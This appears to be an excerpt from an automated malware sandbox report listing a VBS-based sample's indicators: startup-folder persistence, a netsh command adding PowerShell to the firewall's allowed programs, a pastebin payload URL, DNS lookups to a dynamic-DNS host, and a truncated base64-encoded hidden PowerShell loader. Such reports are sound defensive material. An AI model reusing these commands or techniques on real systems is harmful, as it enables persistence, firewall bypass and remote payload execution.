Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\update.vbs
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE
- https://pastebin.com/raw/uwegtu7z
- %TEMP%\fud.vbs
- %TEMP%\little registry cleaner.lnk
- 'pa###bin.com':443
- DNS ASK pa###bin.com
- DNS ASK em######momoody55.d2dns.net
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\Fud.vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAt... (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE (with hidden window)